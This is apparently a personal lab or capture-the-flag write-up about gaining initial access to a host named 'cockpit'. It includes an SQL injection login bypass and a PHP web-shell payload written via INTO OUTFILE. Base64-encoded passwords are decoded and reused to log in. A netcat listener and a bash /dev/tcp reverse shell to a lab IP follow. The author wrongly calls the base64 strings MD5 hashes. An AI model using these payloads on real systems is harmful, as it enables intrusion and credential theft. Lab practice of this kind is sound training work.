blaze login page [SQLi-initial]

I checked that this login page is vulnearble to SQLI.

From the error, it is clear that the underlying system is MySQL.

offsec' OR 1=1 -- //

I will use this payload for authenticatoin bypass. Got the hashes.

Note: Repeatedly executing the SQL injection command results in the error shown below.

Found hashes

Username 	Password
james 	        Y2FudHRvdWNoaGh0aGlzc0A0NTUxNTI=
cameron 	dGhpc3NjYW50dGJldG91Y2hlZGRANDU1MTUy

It looks like MD5 password. I will use crackstation website to crack this. But it stays it is unrecoganized hash format.

Given above as username and password I am unable to login.

Trying RCE [Failed]

Tried to get the shell using RCE payload but I dont have permission to write to the file.

' UNION SELECT "<?php system($_GET['cmd']);?>", null, null, null, null INTO OUTFILE "/var/www/html/shell.php" -- //

Cracking Hash [Worked]

I will try cyberchef to crack this password.

Username 	Password                                cracked_value
james 	        Y2FudHRvdWNoaGh0aGlzc0A0NTUxNTI=        canttouchhhthiss@455152
cameron 	dGhpc3NjYW50dGJldG91Y2hlZGRANDU1MTUy    thisscanttbetouchedd@455152

Now Let's try to login.

firefox http://cockpit:9090

james:canttouchhhthiss@455152

We are able to login with james username and password but failed to do the same with cameron username and password.

In the website, I found terminal there. I will run the reverse shell command and get the shell.

sudo rlwrap -cAr nc -lnvp 80

bash -c "bash -i >& /dev/tcp/192.168.45.242/80 0>&1"

Got the shell.

Stabilize it.

(command -v python && python -c 'import pty; pty.spawn("/bin/bash");') || (command -v python3 && python3 -c 'import pty; pty.spawn("/bin/bash");')

Previoushttp Nextprivilege escalation

Last updated 1 year ago

Was this helpful?

hashtagTrying RCE [Failed]

hashtagCracking Hash [Worked]

Trying RCE [Failed]

Cracking Hash [Worked]